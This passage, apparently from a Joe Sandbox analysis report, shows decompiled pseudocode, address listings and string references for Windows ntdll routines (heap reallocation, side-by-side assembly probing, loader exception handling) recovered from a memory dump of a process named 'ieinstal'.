						 *(_t284 - 0x34) = _t226;
					}
					E1F070835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E1EFB753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x1f0b47c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x1f0b47cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1f0b47ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E1EFBB910();
							} else {
								E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E1F06823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E1EFBB910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x1f0b47a1 = 1;
								 *0x1f0b4100 = 0;
								asm("int3");
								 *0x1f0b47a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E1EFBB910();
						} else {
							E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1EFBB910("Just reallocated block at %p to %Ix bytes\n",  *0x1f0b47c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x1f0b47c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E1EFD2710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E1F07D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E1EFF3AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E1EFEFDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E1F070D24(_t281);
								__eflags = 0;
								E1F070835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x1f0b47cc;
							if( *0x1f0b47cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E1F07D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E1EFF3AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x1f0b47cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1f0b47ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E1EFBB910();
								} else {
									E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E1F06823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E1EFBB910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x1f0b47a1 = 1;
									 *0x1f0b4100 = 0;
									asm("int3");
									 *0x1f0b47a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E1EFBB910();
						} else {
							E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1EFBB910("About to reallocate block at %p to %Ix bytes\n",  *0x1f0b47c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x1f0b374c; // 0x0
					 *0x1f0b91e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}

0x1f06fdf4
0x1f06fdf6
0x1f06fdfb
0x1f06fe02
0x1f06fe04
0x1f06fe09
0x1f06fe0c
0x1f06fe16
0x1f06fe35
0x1f06fe38
0x1f06fe46
0x1f06fe4b
0x1f06fe4d
0x1f070277
0x1f070277
0x1f07027a
0x1f07027a
0x1f0702c2
0x1f0702c9
0x1f0702ce
0x00000000
0x1f0702ce
0x1f06fe56
0x1f06fe58
0x1f06fe62
0x1f06fe65
0x1f06fe69
0x1f06fe72
0x1f06fe72
0x1f06fe6b
0x1f06fe6b
0x1f06fe6b
0x1f06fe81
0x1f06fe84
0x1f06fe87
0x1f06fe8a
0x1f070231
0x1f070231
0x1f070237
0x1f07023a
0x1f070259
0x1f07025e
0x1f07023c
0x1f070251
0x1f070256
0x1f070264
0x1f07026f
0x00000000
0x1f070274
0x1f06fe90
0x1f06fe93
0x00000000
0x00000000
0x1f06fe9b
0x1f06fe9f
0x1f06fea2
0x1f06feaa
0x1f06feaf
0x1f06feb6
0x1f06feb6
0x1f06febb
0x1f06febb
0x1f06fec2
0x1f06fec7
0x1f06feca
0x1f06fecd
0x1f06fed1
0x1f06feda
0x1f06feda
0x1f06feda
0x1f06fedc
0x1f06fedf
0x1f06fee7
0x1f06fee9
0x1f06feee
0x1f06fef0
0x1f070122
0x1f070122
0x1f070125
0x1f070127
0x00000000
0x00000000
0x1f07012d
0x1f070133
0x1f070139
0x1f0701a7
0x1f0701aa
0x1f0701ad
0x1f0701b2
0x00000000
0x00000000
0x1f0701bc
0x1f0701c3
0x00000000
0x00000000
0x1f0701cd
0x1f0701d4
0x00000000
0x00000000
0x1f0701da
0x1f0701e0
0x1f0701e3
0x1f070202
0x1f070207
0x1f0701e5
0x1f0701fa
0x1f0701ff
0x1f070218
0x1f070219
0x1f070224
0x1f07017e
0x1f07017e
0x1f070184
0x1f070188
0x1f07018e
0x1f070195
0x1f07019b
0x1f07019c
0x1f07019c
0x00000000
0x1f070188
0x1f07013b
0x1f07013e
0x1f07015d
0x1f070162
0x1f070140
0x1f070155
0x1f07015a
0x1f070168
0x1f070176
0x00000000
0x1f06fef6
0x1f06fef6
0x1f06fefc
0x1f06ff02
0x1f06ff70
0x1f06ff73
0x1f06ff76
0x1f06ff7b
0x1f070068
0x1f070070
0x1f070075
0x1f070078
0x1f07007a
0x1f070080
0x1f070080
0x1f070083
0x1f070087
0x1f070090
0x1f070090
0x1f070090
0x1f070092
0x1f070094
0x1f070097
0x1f07009a
0x1f07009f
0x1f0700a9
0x1f0700ac
0x1f0700ae
0x1f0700af
0x1f0700b3
0x1f0700b3
0x1f0700ac
0x1f0700b8
0x1f0700bc
0x1f0700ec
0x1f0700ef
0x1f0700f2
0x1f0700be
0x1f0700c0
0x1f0700c5
0x1f0700ca
0x1f0700d1
0x1f0700e3
0x1f0700d3
0x1f0700d4
0x1f0700d9
0x1f0700dc
0x1f0700df
0x1f0700df
0x1f0700e6
0x1f0700e6
0x1f0700f5
0x1f0700f9
0x1f0700fc
0x1f070108
0x1f07010e
0x1f07010e
0x1f07010e
0x1f0700fc
0x1f070114
0x1f070119
0x1f07011d
0x00000000
0x1f07011d
0x1f06ff81
0x1f06ff88
0x00000000
0x00000000
0x1f06ff8e
0x1f06ff91
0x1f06ff94
0x1f06ff97
0x1f06ff9c
0x1f06ffa6
0x1f06ffa9
0x1f06ffab
0x1f06ffb0
0x1f06ffb5
0x1f06ffb5
0x1f06ffa9
0x1f06ffb8
0x1f06ffbc
0x1f06ffce
0x1f06ffd1
0x1f06ffd4
0x1f06ffbe
0x1f06ffc0
0x1f06ffc5
0x1f06ffc8
0x1f06ffc8
0x1f06ffd7
0x1f06ffd9
0x1f06ffdd
0x1f06ffe0
0x1f06ffea
0x1f06fff0
0x1f06fff0
0x1f06fff0
0x1f06fff2
0x1f06fff5
0x1f070065
0x1f070065
0x1f06fff7
0x1f06fff7
0x1f06fffe
0x00000000
0x00000000
0x1f070004
0x1f07000b
0x00000000
0x00000000
0x1f07000d
0x1f070013
0x1f070016
0x1f070035
0x1f07003a
0x1f070018
0x1f07002d
0x1f070032
0x1f070040
0x1f07004b
0x1f07004c
0x1f07004f
0x1f070058
0x1f07005d
0x1f06ff47
0x1f06ff47
0x1f06ff4d
0x1f06ff51
0x1f06ff57
0x1f06ff5e
0x1f06ff64
0x1f06ff65
0x1f06ff65
0x1f06ff51
0x00000000
0x1f06fff5
0x1f06ff04
0x1f06ff07
0x1f06ff26
0x1f06ff2b
0x1f06ff09
0x1f06ff1e
0x1f06ff23
0x1f06ff31
0x1f06ff3f
0x1f06ff44
0x00000000
0x1f06ff44
0x1f06fe18
0x1f06fe20
0x1f06fe28
0x1f06fe2e
0x1f0702d1
0x1f0702d4
0x1f0702e0
0x1f0702e0

Strings

HEAP: , xrefs: 1F06FF26, 1F070035, 1F07015D, 1F070202, 1F070259
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 1F07021F
RtlReAllocateHeap, xrefs: 1F06FE3F, 1F06FEE2
HEAP[%wZ]: , xrefs: 1F06FF19, 1F070028, 1F070150, 1F0701F5, 1F07024C
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 1F070053
Just reallocated block at %p to %Ix bytes, xrefs: 1F070171
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1F07026A
About to reallocate block at %p to %Ix bytes, xrefs: 1F06FF3A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 9ad9344e4cde8e7c05d2f8fd479502b264d53ea4638237fb8e018939a401d158
Instruction ID: e540dc993de625f10bdea925c2856b9c577dcc632833e95ae55f144640a12295
Opcode Fuzzy Hash: 9ad9344e4cde8e7c05d2f8fd479502b264d53ea4638237fb8e018939a401d158
Instruction Fuzzy Hash: 0AD10439500685DFCB11CFA4C850AEDBBF1FF49720F058789E8899B252EB36B941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF2EB8 Relevance: 9.1, Strings: 7, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E1EFF2EB8(signed short __edx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16, signed int* _a20) {
				signed int _v12;
				char _v536;
				signed int _v537;
				signed int* _v544;
				signed int _v548;
				intOrPtr _v552;
				signed short _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				signed short _v572;
				signed short _v576;
				signed int _v584;
				signed short _v588;
				signed short _v592;
				intOrPtr _v596;
				signed short _v600;
				char _v604;
				signed short _v608;
				signed short _v612;
				intOrPtr _v616;
				char* _v620;
				intOrPtr _v624;
				char _v628;
				char _v636;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t92;
				signed short _t104;
				signed short _t107;
				short _t110;
				signed int _t117;
				char _t122;
				intOrPtr _t124;
				void* _t129;
				signed int _t133;
				short* _t137;
				signed int _t147;
				signed short _t148;
				intOrPtr _t149;
				signed short _t152;
				signed int _t154;
				short _t156;
				signed int _t169;
				void* _t170;
				void* _t171;
				signed short* _t173;
				void* _t174;
				void* _t175;
				short* _t178;
				intOrPtr _t179;
				signed int _t180;

				_v12 =  *0x1f0bb370 ^ _t180;
				_t149 = _a8;
				_t92 = _a12;
				_t148 = __edx;
				_v568 = _t149;
				_v572 = _a16;
				_t173 = _a4;
				_v544 = _a20;
				_v548 = _v548 & 0;
				_v584 = 0;
				_t169 = 0;
				_v537 = 0;
				_v560 = 0;
				_v556 = 0;
				_v576 = 0;
				_t167 = _v572;
				_v564 = _t173;
				_v552 = _t92;
				if(_t167 != 0) {
					 *_t167 =  *_t167 & 0;
				}
				if(_v544 != _t169) {
					 *_v544 =  *_v544 & _t169;
					_t149 = _v568;
				}
				if(_t148 == 0 || _t173 == 0 || _t149 == 0 || _t92 == 0 || _t167 == 0 || _v544 == _t169) {
					_push(_v544);
					_push(_t167);
					_push(_t92);
					_push(_t149);
					_push(_t173);
					_push(_t148);
					_push(0);
					E1F04EF10(0x33, 0, "SXS: %s() bad parameters\nSXS:  Flags:               0x%lx\nSXS:  Root:                %p\nSXS:  AssemblyDirectory:   %p\nSXS:  PreAllocatedString:  %p\nSXS:  DynamicString:       %p\nSXS:  StringUsed:          %p\nSXS:  OpenDirectoryHandle: %p\n", "RtlpProbeAssemblyStorageRootForAssembly");
					_t174 = 0xc000000d;
					goto L24;
				} else {
					_t152 =  *_t148 & 0x0000ffff;
					_t167 = _t152;
					_t171 = 0x5c;
					if(_t152 != 0) {
						_t147 =  *( *((intOrPtr*)(_t148 + 4)) + (_t152 >> 1) * 2 - 2) & 0x0000ffff;
						_t152 =  *_t148 & 0x0000ffff;
						if(_t147 != _t171) {
							if(_t147 != 0x2f) {
								_v537 = 1;
								_t167 = _t167 + 2;
							}
						}
					}
					_t104 = ( *_t173 & 0x0000ffff) + 4 + _t167;
					_v588 = _t104;
					if(_t104 > 0xfffe) {
						_push("SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.\n");
						_push(0);
						_push(0x33);
						E1F04EF10();
						_t174 = 0xc0000106;
						L28:
						if(_v548 != 0) {
							_push(_v548);
							E1F002A80();
						}
						_pop(_t170);
						_pop(_t175);
						return E1F004B50(_t174, _t148, _v12 ^ _t180, _t167, _t170, _t175);
					}
					if(_t104 > 0x208) {
						_t176 = _t104 & 0x0000ffff;
						_t169 = E1EFD5D60(_t104 & 0x0000ffff);
						if(_t169 != 0) {
							_t107 =  *_t148 & 0x0000ffff;
							goto L15;
						}
						E1F04EF10(0x33, _t106, "SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.\n", _t176);
						_t174 = 0xc0000017;
						goto L28;
					} else {
						_t169 =  &_v536;
						_t107 = _t152 & 0x0000ffff;
						L15:
						E1F0088C0(_t169,  *((intOrPtr*)(_t148 + 4)), _t107 & 0x0000ffff);
						_t178 = ( *_t148 & 0x0000ffff) + _t169;
						if(_v537 != 0) {
							_t110 = 0x5c;
							 *_t178 = _t110;
							_t178 = _t178 + 2;
						}
						E1F0088C0(_t178,  *((intOrPtr*)(_v564 + 4)),  *_v564 & 0x0000ffff);
						_t154 = _v564;
						_t167 = 0;
						 *((short*)(( *_t154 & 0x0000ffff) + _t178)) = 0;
						_t117 = (_v537 & 0x000000ff) + (_v537 & 0x000000ff) +  *_t154 +  *_t148;
						_t148 = 0;
						_v584 = _t117;
						if(E1EFE1C10(_t169,  &_v560, 0,  &_v604) == 0) {
							E1F04EF10(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _t169);
							_t174 = 0xc000003a;
							goto L26;
						} else {
							_t122 = _v604;
							_t167 = _v556;
							_v576 = _v556;
							if(_t122 != 0) {
								_v560 = _t122;
								_v556 = _v600;
								_t124 = _v596;
							} else {
								_t124 = 0;
							}
							_v624 = _t124;
							_push(0x21);
							_v620 =  &_v560;
							_push(3);
							_push( &_v636);
							_v628 = 0x18;
							_push( &_v628);
							_push(0x100020);
							_v616 = 0x40;
							_push( &_v548);
							_v612 = _t148;
							_v608 = _t148;
							_t129 = E1F002CE0();
							_t148 = _v592;
							_t174 = _t129;
							if(_t148 != 0) {
								asm("lock xadd [ebx], ecx");
								if((_t154 | 0xffffffff) == 0) {
									_push( *((intOrPtr*)(_t148 + 4)));
									E1F002A80();
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t148);
								}
							}
							if(_t174 < 0) {
								if(_t174 == 0xc000000f || _t174 == 0xc0000034 || _t174 == 0xc000003a) {
									_t174 = 0xc0150004;
								} else {
									_push(_t174);
									E1F04EF10(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _t169);
								}
								goto L24;
							} else {
								_t179 = _v568;
								_t148 = _v588;
								if(_t148 > ( *(_t179 + 2) & 0x0000ffff)) {
									if(_t169 ==  &_v536) {
										_t133 = E1EFD5D60(_t148);
										_t179 = _v552;
										 *(_t179 + 4) = _t133;
										if(_t133 != 0) {
											E1F0088C0( *(_t179 + 4), _t169, _v584 & 0x0000ffff);
											L52:
											 *(_t179 + 2) = _t148;
											goto L23;
										}
										_t174 = 0xc0000017;
										goto L24;
									}
									_t179 = _v552;
									 *(_t179 + 4) = _t169;
									_t169 = 0;
									goto L52;
								} else {
									E1F0088C0( *(_t179 + 4), _t169, _v584 & 0x0000ffff);
									L23:
									_t167 = _v572;
									_t156 = 0x5c;
									 *_t167 = _t179;
									_t137 = (_v584 & 0x0000ffff) +  *(_t179 + 4);
									 *_t137 = _t156;
									 *((short*)(_t137 + 2)) = 0;
									 *( *_t167) = _v584 + 2;
									_v548 = _v548 & 0x00000000;
									_t174 = 0;
									 *_v544 = _v548;
									L24:
									_t94 = _v576;
									if(_v576 != 0) {
										E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t94);
									}
									L26:
									if(_t169 != 0 && _t169 !=  &_v536) {
										E1EFBBA80(_t169);
									}
									goto L28;
								}
							}
						}
					}
				}
			}

0x1eff2eca
0x1eff2ecd
0x1eff2ed0
0x1eff2ed4
0x1eff2ed6
0x1eff2edf
0x1eff2ee9
0x1eff2eec
0x1eff2ef4
0x1eff2efb
0x1eff2f01
0x1eff2f03
0x1eff2f09
0x1eff2f0f
0x1eff2f15
0x1eff2f1b
0x1eff2f21
0x1eff2f27
0x1eff2f2f
0x1eff2f31
0x1eff2f31
0x1eff2f39
0x1eff2f41
0x1eff2f43
0x1eff2f43
0x1eff2f4b
0x1f0327a9
0x1f0327af
0x1f0327b0
0x1f0327b1
0x1f0327b2
0x1f0327b3
0x1f0327b4
0x1f0327c4
0x1f0327cc
0x00000000
0x1eff2f7d
0x1eff2f7d
0x1eff2f80
0x1eff2f84
0x1eff2f88
0x1eff2f8f
0x1eff2f94
0x1eff2f9a
0x1f03264b
0x1f032651
0x1f032658
0x1f032658
0x1f03264b
0x1eff2f9a
0x1eff2fa6
0x1eff2fa8
0x1eff2fb3
0x1f032660
0x1f032665
0x1f032667
0x1f032669
0x1f032671
0x1eff316c
0x1eff3173
0x1f0327d6
0x1f0327dc
0x1f0327dc
0x1eff317e
0x1eff317f
0x1eff3189
0x1eff3189
0x1eff2fbe
0x1f03267b
0x1f032684
0x1f032688
0x1f0326a5
0x00000000
0x1f0326a5
0x1f032693
0x1f03269b
0x00000000
0x1eff2fc4
0x1eff2fc4
0x1eff2fca
0x1eff2fcd
0x1eff2fd5
0x1eff2fe0
0x1eff2fe9
0x1f0326af
0x1f0326b0
0x1f0326b3
0x1f0326b3
0x1eff2ffd
0x1eff3002
0x1eff3008
0x1eff3010
0x1eff3021
0x1eff3024
0x1eff3026
0x1eff3044
0x1f0326c4
0x1f0326cc
0x00000000
0x1eff304a
0x1eff304a
0x1eff3050
0x1eff3056
0x1eff305f
0x1f0326d6
0x1f0326e2
0x1f0326e8
0x1eff3065
0x1eff3065
0x1eff3065
0x1eff3067
0x1eff3073
0x1eff3075
0x1eff3081
0x1eff3083
0x1eff308a
0x1eff3094
0x1eff3095
0x1eff30a0
0x1eff30aa
0x1eff30ab
0x1eff30b1
0x1eff30b7
0x1eff30bc
0x1eff30c2
0x1eff30c6
0x1f0326f6
0x1f0326fa
0x1f032700
0x1f032703
0x1f032714
0x1f032714
0x1f0326fa
0x1eff30ce
0x1f032724
0x1f03274e
0x1f032736
0x1f032736
0x1f032741
0x1f032746
0x00000000
0x1eff30d4
0x1eff30d4
0x1eff30da
0x1eff30e6
0x1f032760
0x1f032770
0x1f032775
0x1f03277b
0x1f032780
0x1f032798
0x1f0327a0
0x1f0327a0
0x00000000
0x1f0327a0
0x1f032782
0x00000000
0x1f032782
0x1f032762
0x1f032768
0x1f03276b
0x00000000
0x1eff30ec
0x1eff30f8
0x1eff3100
0x1eff3100
0x1eff310f
0x1eff3110
0x1eff3112
0x1eff3115
0x1eff311a
0x1eff3129
0x1eff3138
0x1eff313f
0x1eff3141
0x1eff3143
0x1eff3143
0x1eff314b
0x1eff3159
0x1eff3159
0x1eff315e
0x1eff3160
0x1eff318d
0x1eff318d
0x00000000
0x1eff3160
0x1eff30e6
0x1eff30ce
0x1eff3044
0x1eff2fbe

Strings

SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 1F032738
SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 1F032660
SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 1F0327BB
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 1F0326BC
RtlpProbeAssemblyStorageRootForAssembly, xrefs: 1F0327B6
SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 1F03268B
@, xrefs: 1EFF30A0

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
API String ID: 0-541586583
Opcode ID: 36a57fe785f7ca620332bad9dd3927d059339fd1ba46a3427d1b8323ccec1e17
Instruction ID: 9b029cbc99b00d47749ce49b4927a87ad065b9b5c1e207e3641a412df76c1559
Opcode Fuzzy Hash: 36a57fe785f7ca620332bad9dd3927d059339fd1ba46a3427d1b8323ccec1e17
Instruction Fuzzy Hash: 6DC18076D01229DFDB21DF55CC94BAAB7B4EF45711F1141EAE808AB290E734AE81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1F044A57 Relevance: 8.8, Strings: 7, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1F044A57(void* __edx) {
				char _v8;
				void* __ecx;
				signed char _t11;
				char _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t30;
				intOrPtr _t33;
				intOrPtr* _t35;
				intOrPtr* _t47;
				intOrPtr* _t50;
				void* _t57;
				void* _t58;

				_push(_t35);
				_t11 =  *0x1f0b37c0; // 0x0
				_t47 = _t35;
				_t50 =  *_t47;
				_t33 =  *_t50;
				if((_t11 & 0x00000003) != 0) {
					_push( *((intOrPtr*)(_t47 + 4)));
					_push(_t50);
					_push(_t33);
					E1F03E692("minkernel\\ntdll\\ldrutil.c", 0x233, "LdrpGenericExceptionFilter", 0, "Function %s raised exception 0x%08lx\n\tException record: .exr %p\n\tContext record: .cxr %p\n", __edx);
					_t11 =  *0x1f0b37c0; // 0x0
				}
				if((_t11 & 0x00000010) != 0) {
					asm("int3");
				}
				if((_t11 & 0x00000030) != 0x20) {
					L17:
					return 1;
				} else {
					while(1) {
						_push("\n***Exception thrown within loader***\n");
						E1EFBB910();
						E1F04EF70("Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? ",  &_v8, 2);
						_t18 = _v8;
						_t57 = _t18 - 0x62;
						if(_t57 > 0) {
							goto L9;
						}
						if(_t57 == 0) {
							L16:
							E1EFBB910("Execute \'.cxr %p\' to dump context\n",  *((intOrPtr*)(_t47 + 4)));
							asm("int3");
							goto L17;
						}
						_t30 = _t18 - 0x42;
						_t58 = _t30;
						if(_t58 == 0) {
							goto L16;
						}
						_t19 = _t30 - 7;
						L10:
						if(_t58 == 0) {
							goto L17;
						}
						_t20 = _t19 - 6;
						if(_t20 == 0) {
							goto L16;
						}
						_t22 = _t20 - 1;
						if(_t22 == 0) {
							E1F040371( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38, 0x1efa12c8);
							_push(_t33);
							_push(0xffffffff);
							E1F002C70();
						} else {
							if(_t22 == 4) {
								E1F040371( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38, 0x1efa11c8);
								_push(_t33);
								_push(0xfffffffe);
								E1F002EE0();
							}
						}
						continue;
						L9:
						_t19 = _t18 - 0x69;
						goto L10;
					}
				}
			}

0x1f044a5c
0x1f044a5d
0x1f044a65
0x1f044a67
0x1f044a69
0x1f044a6d
0x1f044a6f
0x1f044a72
0x1f044a73
0x1f044a8b
0x1f044a90
0x1f044a95
0x1f044a9a
0x1f044a9c
0x1f044a9c
0x1f044aa1
